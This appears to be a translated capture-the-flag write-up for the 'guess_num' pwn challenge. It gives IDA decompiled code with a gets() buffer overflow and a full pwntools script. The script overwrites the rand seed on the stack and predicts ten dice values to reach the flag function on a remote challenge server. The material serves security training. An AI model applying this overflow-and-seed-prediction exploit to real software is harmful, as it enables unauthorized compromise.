PWN attack and defense world guess_ num

First , Let's take a look at file attributes and protection first .

The protection is basically fully open . Drop file into IDA.

__int64 __fastcall main(int a1, char **a2, char **a3)
{
    
  int v4; // [rsp+4h] [rbp-3Ch] BYREF
  int i; // [rsp+8h] [rbp-38h]
  int v6; // [rsp+Ch] [rbp-34h]
  char v7[32]; // [rsp+10h] [rbp-30h] BYREF
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v4 = 0;
  v6 = 0;
  *(_QWORD *)seed = sub_BB0();
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:");
  gets(v7);
  srand(seed[0]);
  for ( i = 0; i <= 9; ++i )
  {
    
    v6 = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v4);
    puts("---------------------------------");
    if ( v4 != v6 )
    {
    
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();
  return 0LL;
}

use IDA64 open , find main function ,F5 Decompile , It can be concluded that the basic logic is ： First from input gets A name , Then initialize the random number generator with the seed , Process the generated random number , Then enter an integer , Compare the processed value of random number with the input value , If 10 If all round comparisons are the same, it will be successful , Call sub_C3E(). This function will cat flag.
To write Python Script ：

from pwn import *
from ctypes import *

context(os='Linux',arch="amd64",log_level="debug")
content = 0 

def srand():

	lib = cdll.LoadLibrary("libc.so.6")
	lib.srand(1)
	
	for i in range(10):
		number = str(lib.rand() % 6 + 1)
		day3.recvuntil("Please input your guess number:")
		day3.sendline(number)
def main():
	global day3
	if content == 1:
		day3 = process("guess_num")
	else:
		day3 =remote("111.200.241.244",49182)
		
	payload = b'a' * (0x30 - 0x10) + p64(1)
	
	day3.recvuntil("Your name:")
	day3.sendline(payload)
	
	srand()
	day3.interactive()
	
main()

get Flag.